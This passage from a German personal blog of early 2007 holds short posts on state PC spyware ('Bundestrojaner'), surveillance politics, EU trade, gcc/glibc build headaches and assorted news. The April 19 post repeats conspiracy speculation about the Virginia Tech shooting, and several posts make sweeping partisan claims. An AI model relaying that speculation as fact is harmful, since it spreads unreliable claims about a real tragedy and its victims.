In einem Fall sollen Festplatteninhalte von 120 Gigabyte über Wochen hinweg an die Zieladresse des Verfassungsschutzes von einem Trojaner geschickt worden sein. Der betroffene PC-Besitzer, der da online ausgespäht wurde, hat das wohl nach 14 oder 15 Tagen gemerkt, weil er über ausgewertete Systeminformationen mitbekam, dass 120 Megabyte von seinem Rechner aus ins Netz geschickt wurden. Die Rechneranalyse ergab dann, dass ein Trojanisches Pferd Schadsoftware von einem Rechner eines V-Mannes herunter geladen hatte. Diese Schadsoftware bestand im Wesentlichen aus einem Programm, dass einen Port im Router der überwachten beziehungsweise online durchsuchten DV-Anlage öffnete und über diesen Port Dateien an einen Rechner schickte, dessen IP-Adresse maskiert war. Dass eine solche Online-Durchsuchung dann offenbar nach Tagen, wohlgemerkt während sie noch läuft, bemerkt wird, ist nicht nur blamabel, sondern gibt natürlich auch den betroffenen Besitzern durchsuchter PCs Möglichkeiten der Gegenwehr an die Hand. In einem anderen Fall hat der Besitzer eines online durchsuchten PCs unbestätigten Informationen zufolge den Trojaner gleich beim Einschleusen bemerkt, die Aktivitäten des Bundestrojaners genau analysiert und der Zieladresse dann regelrechten Datenmüll geschickt.
Auf die Inkompetenz der Behörden ist halt Verlaß. Die nehmen halt an, daß ihre Ziele genau so wenig oder noch weniger drauf haben als sie selber, und während das bei Bankräubern und Nazi-Schlägern offenbar eine gültige Annahme ist, läuft das im Internet nicht so gut. Oh, BTW: wer bei sich einen Trojaner findet, der Daten zum Verfassungsschutz rausschickt, der möge ihn bitte dem CCC geben. Wir geben das dann den Antivirenherstellern und dokumentieren, ob sie ihr Wort halten, und den erkennen. Und vielleicht haben wir auch Zeit, und den mal in Ruhe anzugucken, nur so aus wissenschaftlicher Neugier, versteht sich.
Oh, noch ein interessantes Detail, zur Frage, wie der Trojaner überhaupt auf die Rechner kam:
Zum einen, das ist sozusagen die sichere Methode, sollen Verfassungsschutzmitarbeiter einfach in Büroräume eingedrungen sein und den Bundestrojaner dann händisch auf die Zielrechner überspielt haben. Mit dem zweiten Verbreitungsweg, von dem man aus so genannten informierten Kreisen hört, haben die Verfassungsschützer damit offensichtlich keine so guten Erfahrungen gemacht. Sie sollen mit Trojaner verseuchte CDs verteilt haben. Und das Problem dabei soll gewesen sein: Neben den Zielrechnern, die sie online durchsuchen wollten, sind auch andere Rechner mit diesem Trojaner wohl verseucht worden. Und das soll zur Folge gehabt haben, dass so viele Daten an den Zielrechner geschickt worden sind, dass der Sammelrechner, auf dem die ganzen Durchsuchungsdaten landen sollten, sich offensichtlich wie bei einem Denial of Servcie Angriff verhalten hat. Das heißt, ob der vielen Daten soll der einfach in die Knie gegangen sein.
Tja, hab ich wohl weitgehend Recht gehabt mit meinen Ansagen. Oh, und als I-Tüpfelchen geben sie auch noch zu, daß die Daten nicht gerichtsverwertbar sind. Meine Damen und Herren, so sieht ein Totalschaden aus. :-) (Danke, Florian)

Tue May 1 2007

[l] Noch eine empfehlenswerte Sendung, die kürzlich lief: "Vergiftete Geschenke - wie die EU Afrika in die Armut treibt", ein Spiegel-TV Special. Sieht gerade nicht so aus, als würde das in Kürze wiederholt, aber vielleicht hat das ja jemand aufgenommen oder findet es irgendwo. Da zeigen sie,
1. wie die EU Fischer subventioniert, die dann vor Afrika die Küsten leeren.
2. wie Altkleiderspenden noch in Deutschland an Recycling-Unternehmen verkauft werden, wie sie dann bei uns oder in Dubai (!) im Akkord sortiert wird, dann über diverse Zwischenhändler in Afrika verkloppt wird, und damit die dortige Textilbranche platt gemacht hat.
3. daß es in Afrika keine Milch mehr zu kaufen gibt, weil das subventionierte EU-Import-Milchpulver viel billiger ist als Milch es wäre.
Und nicht nur die EU ist da am Start. In einem Segment haben sie im Senegal in einem Laden versucht, für das Nationalgericht die Ingredienzien zu kaufen. Der Reis kam aus Thailand, Zwiebeln und Tomaten aus Holland, und aus dem Senegal selbst kam überhaupt nur der Fisch, und der wird wegen der Überfischung durch EU-Fischer immer teurer, so daß es ihn bald nur noch für Reiche geben wird.
Was ich an dieser ganzen Sache immer am schlimmsten finde: ALLE leben in Armut. Die Bauern in der EU, die Afrikaner sowieso, die Wäschesortierer, wir haben uns da ein System aufgebaut, bei dem am Ende niemand mehr von seiner Arbeit leben kann. Und alle sagen "Tja, das ist Globalisierung, so ist das halt" und gucken, daß es ihnen weniger schlecht geht als den anderen.

Mon Apr 30 2007

[l] Vielen aufrichtigen Dank, Herr Schäuble, daß Sie das Volk politisieren. Wir Blogger versuchen das ja seit Jahren, aber wir haben immer nur einen kleinen interessierten Zirkel erreicht. Alles Leute, die eh schon politisch interessiert waren. Aber Dank Ihrer hervorragenden Arbeit, und an dieser Stelle darf auch Herr Hartz nicht unerwähnt bleiben, beginnen immer mehr Leute, ihren Kopf als mehr als ein Fundament für die Frisur zu benutzen. Und auch das Timing ist exzellent, keine Minute zu früh, denn wenn da überhaupt noch jemand was reißen will bei der verkackten Gesundheitsreform, wenn wir die Menschenrechte in Deutschland wieder herstellen wollen, wenn wir eine Regierung herbeiführen wollen, die versteht, daß sie im Auftrage des Volkes dafür arbeiten, Entscheidungen im Sinne des Volkes zu treffen, dann brauchen wir jeden Mann und jede Frau, die wir kriegen können. In diesem Sinne: weitermachen. Gute Arbeit.
Die Merkel ist ja eine echte Unsympathin, an Inkompetenz kaum zu überbieten, aber sie macht einfach zu wenig Schaden, um irgendjemanden zu mehr als einem Augenrollen zu motivieren. Deutschland braucht mehr Leute wie Sie an der Macht. Leute wie den Koch, die Schmidt, die Zypries, Leute, die das Volk nach Strich und Faden verarschen, die alles kaputt machen, in dessen Nähe man sie läßt. Das hat der Schröder falsch gemacht. Gut, der hatte den Schily, aber ansonsten haben seine Spezialisten eher langfristig versagt, der kurzfristige Schaden hat nicht ausgereicht, um die Leute hoch zu jagen. Gut, daß wir jetzt Sie haben. Nicht auszudenken, wenn das Volk weiter vor sich hin gepennt hätte.
Aber heute findet man Politik, wo man hinguckt. Im Spreeblick, wo es früher hauptsächlich um "hach ist (Kreuzberg|die Blogosphäre|Berlin|das alles) geil" und Musik ging, geht es jetzt auch schon mal um Politik; im Parteibuch ist das Abmahnen in den Hintergrund getreten, und es gibt längliche Analysen des Tagesgeschehens, selbst bei Heise kommt immer mehr Politik und immer weniger "Prozessoren jetzt NOCH schneller", und natürlich gibt es da noch die lange Liste der Politblogs, die nicht irgendwann keinen Bock mehr hatten, sondern immer am Ball bleiben. Exemplarisch will ich mal das Politblog nennen, und netzpolitik.org ist eh unermüdlich am Ball, … ich denke, das alles gäbe es ohne Ihre Arbeit in dieser Form nicht mehr. Dafür möchte ich Ihnen ausdrücklich danken. Und weil man die Feste feiern muss, wie sie fallen, werde ich mir jetzt ein Gläschen gönnen. Möge diese neue Phase der Aufklärung lange anhalten. Und möge es nicht lange dauern, bis wir diesen ganzen Mumpitz wieder rückgängig gemacht haben. Wir haben ihn offenbar gebraucht.

Sun Apr 29 2007

[l] Verdachtsunabhängige Vorratsdatenspeicherung mal anders, zu Lasten der Politiker: Puffmutter in DC packt ersten Polit-Kunden aus, und es ist der Top Entwicklungshilfe-Berater im Außenministerium, der — oh wie passend — AIDS-Hilfe davon abhängig gemacht hat, daß Prostitution verurteilt wird.

Wed Apr 25 2007

[l] BTW: Das Blog macht jetzt so 20 - 30.000 Hits pro Tag. Whoa. Ist aber noch Luft im Trafficplan. Im März hat das Blog ein bißchen über 3 GB Traffic gemacht, das Design ist ja auch eher schlank. :-)

Thu Apr 19 2007

[l] Ja ja, ich habe die Tagesschau-Umfrage schon gesehen. Mein Freund DrNO hat einen Screenshot gemacht. Immerhin scheint es da doch den einen oder anderen zu geben, der mit unserem Innenminister unzufrieden ist.
Update: Zwei-drei Leute haben mir geschrieben, daß es bei der Abstimmung nicht mit rechten Dingen zuging. ACH NEE. :-) Ich wollte schon einen Kommentar über politisch aktive Perl-Hacker abgeben, habe es mir dann aber gespart, weil ich das offensichtlich fand.
[l] Ich hoffe, daß das eine Ente ist: 150 Mitarbeiter der Bush-Junta haben ihren "Abschluß" bei Pat Robertsons Fundichristen-"College" gemacht, das überhaupt erst kürzlich akkreditiert wurde.
[l] Eine Frage stellt sich gerade auf diversen Verschwörungsblogs bezüglich des Uni-Killers. Der hat mit zwei Handfeuerwaffen 30 Leute ermordet. Wenn man der Berichterstattung glauben darf, hat der ne Killrate von 2/3 oder so. Das ist schon bei unbeweglichen Zielen und Zeit zum Zielen ungewöhnlich, und der Typ hat die Waffen ein paar Wochen vorher gekauft, wird also nicht groß damit geübt haben können. Selbst für Sondereinsatztruppen wäre diese Art von Trefferrate außerordentlich. Denkt nur an die Statistik, wie viel Munition die US-Army im Irak pro Todesfall braucht, und die sind immerhin ausgebildet mit der Waffe.
Und natürlich gibt es da gleich noch ein paar andere Details. Die Schwester von dem Typ hat bei einem Defense Contractor geearbeitet, der lauter Top Secret Kram für die US-Regierung macht. Bei VA Tech haben einige Profs im 9/11 Truth Movement gearbeitet, also argwöhnen manche, daß die ermordet oder eingeschüchtert werden sollten. Dann hat einer der Präsidentschaftskandidaten der Democrats eine Anklage gegen Cheney lostreten wollen, aber das wurde wegen des Massakers verschoben, und da gibt es natürlich auch gleich Theorien über Zusammenhänge. Oh, und die Campus-Polizei hat zwei Stunden rumgesessen, bevor sie was gemacht haben, und einige Blogger fanden auch den Uni-Präsidenten auffällig unerschrocken. Na denkt euch mal euren Teil, was davon ernstzunehmen ist und was nicht.
Eines noch: der hat ein "ich bin mit der Gesamtsituation unzufrieden" Video an NBC geschickt, und zwar nachdem er die ersten beiden ermordet hatte, aber vor den nächsten 30. Und zwar nicht per MMS, sondern per Post. Post! Der geht los, knallt zwei Leute ab, geht dann seelenruhig zur Post, stellt sich in die Schlange, gibt das große Paket (!) mit Videos ab, und dann geht er wieder zurück und knallt noch 30 ab. Er hätte auch noch Munition und Opfer übrig gehabt am Ende, als er sich dann selbst erschossen hat.
Das hat alles ein Geschmäckle, wenn ihr mich fragt.

Tue Apr 17 2007

[l] Tja, ich bin echt zum Zyniker geworden. Bei der College-Ballerei gerade stelle ich mir die folgende Frage: wenn ich die Bush-Junta wäre, dann wäre das der ideale Moment, um unbeobachtet von den immer wieder die gleichen verwackelten Handy-Videos und Interviews mit Zeugen oder Beschossenen bringenden Medien mal ein paar dreckige Dinge zu tun, die schon länger gemacht werden müssen. Was, frage ich mich als gerade, was tun die gerade. Also, liebe Leserschaft, Obacht. Ja, ist traurig, daß die Leute da alle sterben mußten. Gerüchten zufolge hat das DHS erst mal eine Nachrichtensperre verhängt, damit sie in Ruhe einen Backgroundcheck auf den Killer machen können, damit am besten heraus kommt, daß der Azubi bei Al Kaida war. So nutzt das halt jeder für das Polieren seines Weltbildes.
Besonders bedauerlich: ich habe heute mit ein paar Amis darüber gechattet, und da kam dann echt die Ansage, das sei ja ambivalent, ob man den Leuten Waffen geben sollte, denn damit könne man sich ja auch prima verteidigen. Und überhaupt hätten die Bad Guys ja eh Waffen, und da bräuchten wir Good Guys ja auch Waffen, sonst sei das ja ungerecht. Ich persönlich warte ja auf den Auftritt von Charlton Heston in seiner Funktion als Sprachrohr der National Rifle Association. So ist das halt in den USA, die merken echt nichts mehr. Und da kann man auch mit Argumenten kommen, da bewegt sich gar nichts. Bei uns in Deutschland, sagte ich, gibt es sowas sehr selten, und wenn, dann weil der Vater Jäger oder im Schützenverein war, und der Sohnemann so Zugang zu Schußwaffen hatte. Ja, sagen sie dann, aber Deutschland ist ja auch viel kleiner als die USA, und daher ist der Vergleich nicht fair. Daraufhin sage ich, daß es in den USA gut dreimal so viele Leute gibt, aber daß es dort jährlich so viele Schulschießereien gibt wie bei uns seit Bestehen der Bundesrepublik. Da kam dann erst mal nichts weiter. Seufz.

Wed Apr 11 2007

[l] Novell schaltet Subpixel Font Rendering ab, weil es da MS-Patente drauf gibt. Es gibt auch prior art, daher ignorieren das alle anderen, aber hey, Novell und MS haben ja diesen Deal gemacht kürzlich.

Mon Apr 9 2007

[l] Filmtipp: Grindhouse. Der neue Tarantino / Rodriguez. Großartiger Film! Ein Zweiteiler wie in den 70ies, mit absichtlich auf schlecht gemachter Aufnahme, kaputten Schnitten (Auto verschwindet plötzlich aus dem Bild und so), mit "oops, der Projektor ist stecken geblieben und der Film brennt durch" und sogar mit "reel missing. the mgmt". Habe mich lange nicht mehr so gut amüsiert. Der erste Teil ist ein Zombie-Kracher ala From Dusk Till Dawn, der zweite Film ist ein Film über einen unglaublichen Stuntmen-Showoff, da verrate ich mal lieber nichts weiter drüber. Insgesamt läuft das 3:40. Guckt euch das aber wenn dann im Kino an, nicht auf DVD. Der läuft hier im Kino nur ne Woche, insofern hoffe ich mal, daß der in .de überhaupt in die Kinos kommt, denn das will man gesehen haben.

Sat Apr 7 2007

[l] Wenn man sie schon nicht auf den elektrischen Stuhl packen kann, dann kann man sie wenigstens in den Selbstmord treiben: Weil die Stadt die potentiellen Wohngebiete für Sex Offender so stark eingeschränkt hat, daß nichts anderes übrig blieb, wohnen fünf von ihnen jetzt in Orlando, Florida, unter einer Brücke. Und genau da geht das mit Hartz IV auch hin. Und an den Obdachlosen in den USA kann man sehen, wie die Zukunft bei uns aussieht. Ist ja nicht so als wäre irgendjemand von denen freiwillig obdachlos. Tja, so gehen die ganzen hehren Ziele und das Gefasel von Menschenrechten den Bach runter. EU-Verfassung, Würde des Menschen unantastbar…
Und das ist Globalisierung, liebe Leser. Angleichung. Wenn wir nicht bereit sind, für unsere Güter genug Geld auszugeben, daß sie unter menschenwürdigen Umständen kostendeckend hergestellt werden können, dann werden sie von Leuten anderswo gemacht, und bei uns verdient keiner mehr was, weil hier keiner mehr was macht. Entweder wir erhöhen die Lebensqualität der Chinesen, bis sich das ausgeglichen hat, oder wir senken unsere Lebensqualität. Oder wir haben wieder Protektionismus (was spricht eigentlich dagegen? Also mal abgesehen von Freihandels-Gefasel). Im Moment ist ja klar abzusehen, daß wir lieber unsere Lebensqualität senken. Bin mal gespannt, wie lange das weitergeht, bis das mal jemand merkt.

Fri Apr 6 2007

[l] Counter-Hacken ist in den USA jetzt OK. Ein Admin hatte einen Linux-PC von jemandem aufgemacht, um nach Beweisen zu gucken, daß der Eigentümer seinen Mailserver angegriffen hat. Der Eigentümer war dann der "Ebay-Hacker", und ein Berufungsgericht hat jetzt gesagt, daß die Anklage nicht scheitert, weil die Beweise aus diesem Counter-Hack kamen, d.h. daß der Counter-Hack OK ist.

Tue Apr 3 2007

[l] Ich hatte ja berichtet, wie die Amis das und das hier gemacht haben, aber offenbar gab es da noch einen Hintergrund: eigentlich wollten sie den Chef des Iranischen Sicherheitsrats und den Geheimdienstchef des Irans kidnappen, die zu der Zeit wohl in der Gegend gewesen sein sollen, aber sich dann doch nicht erwischen ließen. (Danke, Thomas)

Mon Apr 2 2007

[l] Oh Mann. Schulrektor findet 3 Wochenstunden Religionsunterricht in der 3. und 4. Klasse zu viel, will lieber Deutsch, Mathe und Förderunterricht, kriegt voll auf die Fresse dafür. Tolles Land haben wir hier. Wieso hält unsere Junta eigentlich an dem Pakt mit den Kirchen fest, den der Adolf damals gemacht hat?

Sat Mar 31 2007

[l] Schöner Hack: Von CD booten, und alle Bootloader-Stages von Vista auf der Platte umgehen, und am Ende hat man Kernel-Level-Privilegien in Vista. Das ist so eine der Sachen, mit denen man immer argumentiert, daß Code Signing eh umgangen werden kann (eine andere ist ein bösartiger Hypervisor, z.B. ein gehackter qemu), aber alle sind immer zu faul, das mal als Proof of Concept zu implementieren. Jetzt hat es halt doch mal jemand gemacht. Sehr schön!
[l] ATI hat einen neuen Treiber released, und der … tut! Also gut, er kompiliert nicht, da muss man größere Bohrungen vornehmen, aber nachdem ich das gemacht hatte, hatte ich plötzlich 3d und xvideo. Whoa!1!! Damit hatte ich schon nicht mehr gerechnet. Hey, vielleicht funktioniert ja auch deren Windows-Treiber spontan? Sollte ich vielleicht sogar ab jetzt auf diesem Notebook die Dinge tun können, mit denen es beworben wurde? Es geschehen noch Zeiten und Wunder. Der 2d-Teil ist immer noch braun, wenn sich Fenster überlappen, aber damit kann ich leben.

Sun Mar 18 2007

[l] Petition für freie Wissenschaft. Die Deutsche Forschungsgemeinschaft und andere fordern, daß öffentlich finanzierte Forschungsergebnisse auch wieder der Öffentlichkeit zugänglich gemacht werden. Wie traurig ist das eigentlich für unser Land, daß man das überhaupt ansprechen muss? Ich fordere ja noch mehr: daß diese Ergebnisse auch der Öffentlichkeit gehören, d.h. nicht per Patent geschützt werden.

Wed Mar 14 2007

[l] Lacher des Tages: Die Amis haben die Kurnaz-Freilassung explizit von der Garantie Deutschlands abhängig gemacht, daß er hier human behandelt würde. Nachdem sie selbst ihn jahrelang eingesperrt und mißhandelt hatten.
Ein deutscher Ministerialbeamter notierte zu der US-Forderung in der Akte handschriftlich die Anmerkung: "Ich glaube, es geht los!?" Im August 2006 wurde Kurnaz angekettet und mit verbundenen Augen mit einer US-Maschine nach Rammstein geflogen und freigelassen.

Sat Mar 10 2007

[l] Ich mecker hier ja viel zu viel, daher heute mal was positives: ich bin seit ner Weile außerordentlich zufriedener Besitzer einer Casio EX-Z750, und das Teil ist so mit abstand der beste Kauf, den ich auf dem Gebiet je gemacht habe. Kein Vergleich zu allen anderen Kameras, die ich bisher gesehen habe, insbesondere weil das Teil SOFORT auslöst. Keine Sekunde zwischen anmachen und Bild machen. Optimal für Schnappschuß-Fotographen wie mich. Man kann da auch mehr einstellen als bei praktisch allen anderen Kameras, und die Bedienerführung ist ausgesprochen snappy. Und kann AVI-MPEG4-Movies aufnehmen, bis der Flash platzt, in 640x480 mit Audio. Mit einem 2 GB Flash kann ich in HQ gut ne Stunde filmen, auf immer noch guter Qualität 2 Stunden. Kurz: großartiges Gerät, happy customer. Einziger Nachteil gegenüber heutigen Kameras: Bilder verwackeln gerne in zwielichtigen Lichtverhältnissen. Und der optische Zoom ist nur 3fach. Aber was sehen meine trüben Augen gerade? Das Nachfolgemodell EX-V7, gerade frisch zur CeBIT offenbar, noch nirgendwo lieferbar. Da steht zwar in der Übersicht nur Anti-Shake-DSP, aber der macht auch mechanische Korrektur und hat Bewegungsanalyse, und was mich ja völlig umhaut: 7-facher optischer Zoom und nimmt Filme als H.264 auf. Whoa. Das Teil werde ich mir sofort kaufen, wenn das irgendwer irgendwo liefern kann. Oh, noch ne Sache, die leider nicht selbstverständlich ist: wenn man das Teil per USB (über nen Cradle bei dem alten) an den Rechner anschließt, fällt da nicht irgendein Hokus-Pokus-Protokoll raus, sondern USB Storage mit einem FAT-Filesystem. Nein, ich kriege kein Geld von Casio (oder sonstwem) für diese Werbung :-)

Tue Mar 6 2007

[l] Gut, Blick ist die "Bild" der Schweiz, aber der Artikel ist schon interessant: "Wie viele Deutsche verträgt die Schweiz" — "Flucht aus dem Armenhaus".
Der Ansturm der deutschen Arbeitskräfte in die Schweiz hat vor allem einen Grund: Deutschland hat sich innerhalb weniger Jahre mutwillig zum Billiglohnland und zum Armenhaus gemacht. Selbst im «Boomjahr» 2006 gingen die Löhne weiter zurück.
(Danke, Mario)

Wed Feb 28 2007

[l] Neues von den Wahlmaschinenhackern aus Holland: Der Nedap-Chef, Groenendaal, hat die Holländische Regierung erpreßt. Er wolle jetzt in den Ruhestand gehen, und wenn die Regierung noch Support für ihre Wahlmaschinen haben will, dann sollen sie die Firma mal jetzt schnell kaufen. Im Übrigen werde seine Firma alle Aktivitäten einstellen, sollte die Regierung Rop einen Platz in der unabhängigen Kommission einräumen, die sich um die Zukunft der Wahlen in Holland kümmern sollte. Als sie keine Reaktion kriegen, wird er deutlicher (das ist am Wahltag!):
"I have ordered my employees to halt all activity until we have received an answer that is acceptable to us"
Das ist ja schon alles übel genug, aber der hat dann auch noch versucht, den Staatsanwalt dazu zu bewegen, Rop zu verhaften!
After all, his activities are destabilizing society and are as such comparable to terrorism. Preventive custody and a judicial investigation would have been very appropriate.
Der Brüller: diese ganzen Briefe haben sich die Wahlmaschinenhacker über das Informationsfreiheitsgesetz Hollands beschafft. Da sieht man mal wieder, wie wichtig so ein Gesetz ist. Hut ab, Rop! Sehr gut gemacht!
[l] Mich fragen ja selten Leute, wieso ich eigentlich hacke. Wir Hacker haben ja nicht viel geschafft über die Jahre, aber irgendwie glauben alle sofort, daß das unglaublich toll sein muss, ein Hacker zu sein. Dabei ist typische Hackerarbeit gar nicht so spannend. Den hundertsten Webshop durchzuprüfen, das fesselt nicht mehr wirklich.
Allerdings gibt es da eine Art Hochgefühl, wenn man einen Angriff findet, oder wenn man einen Angriff noch einen Schritt weiter treibt, oder fast genau so schön: wenn man aus einer zeitkritischen Routine wieder ein paar Cycles rausoptimiert hat. Es gibt da ein Phänomen namens Deep Hack Mode, das man beim Hacken erreichen kann, und zwar beim Reverse Engineering genau so wie beim Programmieren. Darunter muss man sich eine Art Tunnelblick vorstellen, in dem man sich hinein steigert. Ein starker Fokus auf das, was man gerade tut. Ein so starker Fokus, daß manche Leute von Meditation sprechen. Das geht natürlich am besten, wenn man nicht gestört wird, daher kriege ich spät abends die meisten Sachen fertig. Gestern habe ich im Deep Hack Mode die Bignum-Multiplikation auf i386 portiert, und heute habe ich mal einen Additions-Generator gemacht. Die aktuellen Cycle-Werte sind:
- Athlon 64, 32-bit Mode: add 76 cycles (vorher 144), mul 2824 cycles (vorher 4790)
- Athlon 64, 64-bit Mode: add 36 cycles (vorher 109), mul 779 cycles (vorher 1404)
- Core 2, 32-bit Mode: add 276 cycles (vorher 720), mul 7740 cycles (vorher 13416)
- Core 2, 64-bit Mode: add 204 cycles (vorher 660), mul 2208 cycles (vorher 3368)
Die Werte können sich schon sehen lassen, finde ich. Zum Vergleich: gmp/64-bit add 648/111 mul 3516/1511; OpenSSL/64-bit add 444/153 mul 3444/1509. Und ihr könnt euch gar nicht vorstellen, wie gut sich das anfühlt :-) Und deshalb hacke ich. Zu meinen Werten kommt am Ende noch ein bißchen Verwaltungskram dazu, insofern ist das noch nicht final. Aber nahe dran.
[l] Schöner Medien-Hack: Narzissmus 2.0. Mann gibt sich als Gucci-Manager aus, schaltet selbstgemachte Werbekampagnen mit sich selbst als Model für Gucci, mit der Rechnungsadresse von Gucci. Offenbar hat er das auch schon mit Sony BMG gebracht :-) (Danke, Mario)
[l] Die Bush-Junta wähnt sich offenbar immer noch im Recht: Condy sagt an, daß Bush sich nicht an ein Gesetz halten würde, mit dem der Congress den Irakkrieg einschränken wollte. Das ist alles so eine Farce. Der Congress hat ja kürzlich tatsächlich eine Resolution dazu gemacht. Die war "non-binding" — nicht bindend. D.h. sie haben das absichtlich so gemacht, daß Bush sich nicht dran halten muss. Da muss man sich ja schon fragen, was das überhaupt soll alles. War das die Demokraten-Simulation gegenüber den Wählern, "guckt mal, wir tun doch was!1!!" oder wie?
Es gibt übrigens einen funktionierenden Weg, wie der Congress Bush am Kriegführen hindern kann: ein Gesetz, daß die Finanzierung sperrt. (Danke, Klaus)

Sat Feb 24 2007

[l] Instinktiv haben es vermutlich schon die meisten vermutet, aber jetzt hat tatsächlich mal jemand eine repräsentative Umfrage gemacht. Mehr Amerikaner befürworten Terrorismus als alle muslimischen Länder (außer Nigeria). Die genaue Frage war, wie man zu "bombing and other attacks intentionally aimed at civilians" steht. Ob das niemals eine Rechtfertigung dafür gibt, oder ob man das manchmal oder oft rechtfertigen kann. Absichtlich auf Zivilisten zielende Bombenanschläge, das ist Terrorismus.
In den USA haben nur 46% der Befragten gesagt, daß so etwas niemals gerechtfertigt ist, und 24% haben gesagt, man könne das unter Umständen rechtfertigen. Die Umfrage wurde von der University of Maryland durchgeführt, die Schwerpunktforschung zum Thema internationale Umfragen zur Einstellung der Bevölkerung in diversen Ländern machen.
Als Kontrast dazu sagen die bevölkerungsreichsten muslimischen Länder bei einer ähnlichen Umfrage von "Terror Free Tomorrow" in überwältigender Mehrheit, daß es nie eine Rechtfertigung geben kann: Indonesien (74%), Pakistan (86%), Bangladesh (81%). (Danke, Chico)

Thu Feb 22 2007

[l] Endlich fragt mal jemanden die Bauern, bei denen die Raketenabwehr installiert werden soll. Und deren Begeisterung hält sich in Grenzen:
"Um es offen zu sagen, wir haben gleich gedacht, dass die Welt definitiv verrückt ist. Es gibt doch eine Vereinbarung zwischen den Großmächten über Mittel- und Kurzstreckenraketen, und auch die Nato hat versprochen, dass sie ihre strategische Einrichtungen nicht in Richtung der russischen Grenze vorschieben wird."
Ja, so ist das, wenn man sich auf Zusagen der NATO verläßt. Der Verein gehört zugemacht, und zwar jetzt.
Die Angst geht nun um in Trokavec, Terroristen könnten sich die Radarstation als Ziel suchen. Zudem will keiner hier fremde Soldaten, nachdem die Russen in den 90er Jahren hier erst abgezogen sind. "21 Jahre haben wir den Russen gedient", sagt ein Bauer, "und jetzt sollen wir den Amerikanern dienen. Es wurde uns doch erklärt, dass wir jetzt Demokratie haben und keine fremden Soldaten mehr herkommen. Und jetzt kriechen sie wieder in unseren Hintern." Und eine Rentnerin schimpft, sie wolle die Raketensilos hier nicht haben. "Früher bin ich immer in den Wald gegangen, und jetzt darf ich nicht mehr. Welcher Idiot hat sich ausgedacht, dass das hier errichtet werden soll? Die Amerikaner sollen es bei sich zu Hause aufstellen, wenn sie es brauchen. Wir brauchen es nicht."
(Danke, Robert)

Sun Feb 18 2007

[l] In England will man nicht krank werden: Krankenhaus übersieht Krebs in allen 50 Untersuchungen, die sie bei einem Mann gemacht haben. Er ist daran gestorben, bevor er ein 51. Mal untersucht werden konnte.
[l] Wegen immer häufiger auftretenden "Date Rape" Fällen, wo die Opfer behaupten, man habe ihnen willenlos machende Medikamente in den Drink getan, haben die Briten mal eine Studie dazu gemacht, und nur in einem von fünf Fällen Rückstände von Drogen gefunden. Die anderen Fälle waren einfach nur zu viel Alkohol.
[l] gcc und glibc sind echt das dynamische Duo der Unterwelt. Die Tage ist gcc 4.1.2 rausgekommen, und ich wollte den gleich mal kompilieren, und was muss ich feststellen: kompiliert nicht. Warum nicht? Weil das Java Runtime auch im 32-Bit Modus kompiliert wird.
glibc installiert seine Header in /usr/include, und hat verschiedene Header für x86 und x86_64. Man kann aber gcc mit -m32 aufrufen, und dann kompiliert er für x86. Leider benutzt er dann immer noch /usr/include. In den meisten Fällen ist das OK, aber manchmal eben nicht, wie z.B. beim Java-Runtime von gcc. Nun hat gcc einen Override-Mechanismus für sowas. Z.B. included er vor /usr/include noch seinen Override-Pfad /usr/lib64/gcc/x86_64-unknown-linux-gnu/4.1.1/include (bei mir). Nun, leider ist auch dieser Pfad der selbe bei -m32.
gcc hat einen Mechanismus, um sowas zu fixen. Man kann ein specs-File erzeugen. Früher hat gcc das mitgeliefert, heute ist das built-in. Man kann das trotzdem noch extrahieren (ruft mal "gcc -dumpspecs" auf, um euch den Horror mal zu geben) und irgendwo geschickt platzieren, aber … wir haben 2007. Liebe gcc-Leute, das ist unter aller Sau. Fixt das mal. Und wenn die glibc-Deppen nicht pro Plattform andere Includes hätten, wäre das auch alles kein Problem. Das liegt im Übrigen u.a. daran, daß glibc die Kernel-Header included. Ich habe das am Anfang auch gemacht bei der dietlibc. Linus himself hat mir dann eine Mail geschrieben, daß ich das nicht machen soll, weil das nur Probleme macht, und hey, rückblickend hatte der Mann sowas von Recht… tja, nur bis zur glibc hat sich das noch nicht rumgesprochen.
Wenn ihr eine 64-bit Distribution fahrt, dann guckt euch mal an, wie die das regelt. Gentoo hat da echt einmal den Hazmat-Anzug angezogen und ein Konstrukt namens "multilib" gebaut. Auf meinem Gentoo-Testsystem sieht z.B. /usr/include/wchar.h so aus:
```
/* Autogenerated by create_ml_includes() in multilib.eclass */#ifdef __i386__
# include 
#endif /* __i386__ */
#ifdef __x86_64__
# include 
#endif /* __x86_64__ */
```
Na, ist das nicht wi-der-lich? Danke, liebe glibc, daß ihr Linux so effektiv kaputt gemacht habt. Nicht einmal offene Eiterwunden wie X oder Samba sind je so tief gesunken.
Oh, noch nen Nachschlag für die Variante mit dem "specs"-File: wenn ich das anfasse, und da z.B. folgendes bei cpp_options reineditiere:
```
{m32:-isystem /usr/include32}
```
dann hängt mir das natürlich auch beim dietlibc-für-x86-Kompilieren /usr/include32 in den Pfad und macht alles kaputt. Ihr seht schon, wieso Gentoo diese Würg-Lösung gewählt hat.

Sat Feb 17 2007

[l] Habt ihr euch auch schon mal gefragt, wozu der Staat eigentlich Online-Durchsuchungen braucht? Diesen Bullshit mit dem "eine richtige Durchsuchung würde die Täter verschrecken, und die würden dann fliehen" glaubt ja wohl hoffentlich niemand hier. Im PC findet man keinen Sprengstoff und keine Waffen, und die Emails und IM-Nachrichten kann man auch jetzt schon abfangen. Nun, der Beckstein hat sich auf dem Polizeikongress verplappert:
Als Günther Beckstein die Bühne betrat, brandete im Publikum spontan Beifall auf. Auch er befürworte den verdeckten Zugriff auf die heimischen PCs, unter anderem mit dem Argument, die Polizei könne so Urheberrechtsverletzungen verfolgen.
Und plötzlich ergibt die Sache einen Sinn. Denn das einzige, was man mit hoher Sicherheit überall finden wird, sind "Raubkopien". Und vergeßt nicht, daß die da rechtfertigen müssen, wieso sie so viele Durchsuchungen gemacht haben. In den normalen Wohnungen findet man dann ein paar Krümel Drogen oder selbstgebrannte CDs (völlig klar, das müssen Raubkopien sein!1!!), und bei Online-Durchsuchungen wird dann auch die Raubkopie als Erfolgsmesser herhalten müssen.
Oh und habt ihr gesehen, daß die stolz darauf sind, in Hessen jetzt Kinder ab dem 10 Lebensjahr überwachen zu können? Verfassungsschutz? My ass.
[l] Oh Mann, und ich habe mich damals über die USA lustig gemacht, wo dem Staat alle möglichen Datenerhebungen verboten sind, aber Privatfirmen dürfen sie machen, und der Staat darf dann die Daten beschlagnahmen und reingucken. Bei uns sieht das genau so aus: Baden-Württemberg startet Melderegister für private Videokameras, damit die Polizei auf sie zugreifen kann. Auch Webcams fallen darunter. (Danke, Hary)

